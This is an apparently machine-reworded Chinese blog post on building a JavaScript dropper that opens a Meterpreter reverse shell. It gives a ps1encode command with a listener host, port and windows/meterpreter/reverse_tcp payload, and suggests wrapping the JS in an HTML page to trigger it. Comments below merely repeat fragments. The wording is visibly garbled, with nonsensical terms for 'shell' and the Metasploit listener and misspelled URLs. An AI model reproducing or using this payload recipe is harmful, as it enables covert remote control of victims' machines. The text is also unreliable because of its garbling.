利用前端JS文件反弹shell
前三天在freebuf上见到一个利用Ink文档促发进攻链的文章,的确钦佩创作者的脑洞大开。
htpp://www.freebuf.Com/articles/system/207109.hmtl
网络时代无奇不有,多样式留后门,促发条件上升shell.操作够骚硬道理。
0x01:过程
一、利用工具
ActionScript
htpp://github.Com/CroweCybersecurity/ps1encode
二、环境配备
它有很各种添加方式,敬请移步gayhub上查看
今天利用添加的Js文档来上升shell
利用Js文档上升shell
ActionScript
指令:./ps1encode.rb--LHOST 192.168.124.11 --LPORT 6666 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t Js
利用此指令添加Js文档
利用Js文档上升shell
emmm!编码很长,自己拷贝出来放进txt编辑器里。
并重取名为1.Js(文件夹名称随意)。
利用Js文档上升shell
单是放一个Js太有界了。实际环境下可以配合hmtl进行启用Js文档实行。
利用Js文档上升shell
我简单的写了一个hmtl来启用Js文档
当然你也可以 一个Js就上升
利用Js文档上升shell
准备好msf回弹力的环境
实行exploit 等着监视实行
三、实行效果
利用Js文档上升shell
设计效果图
视频设计效果图
0x02:后话
也许我的过程会出现错误、也许我的看法会出现错误。但是我的构思是人烟稀少的。我每一次写的文章想体现不是炫技,我跟每位比,我还是中学生,我也是小菜鸟。我要体现的是构思。如果之后有体现不清楚的,造成您的提出质疑,您可以跟我说,或者搜索引擎。
相关文章
- 3条评论
- 纵遇橘亓2022-05-30 12:03:12
- 不清楚的,造成您的提出质疑,您可以跟我说,或者搜索引擎。
- 惑心一镜2022-05-30 10:01:48
- sf回弹力的环境实行exploit 等着监视实行三、实行效果利用Js文档上升shell设计效果图视频设计效果图0x02:后话 也许我的过程会出现错误、也许我的看法会出
- 冢渊礼忱2022-05-30 03:36:40
- 我简单的写了一个hmtl来启用Js文档当然你也可以 一个Js就上升利用Js文档上升shell准备好msf回弹力的环境实行exploit 等着监视实行三、实行效果利用Js文档上升shell设计效果图视频设计效果图0x02:后话&nbs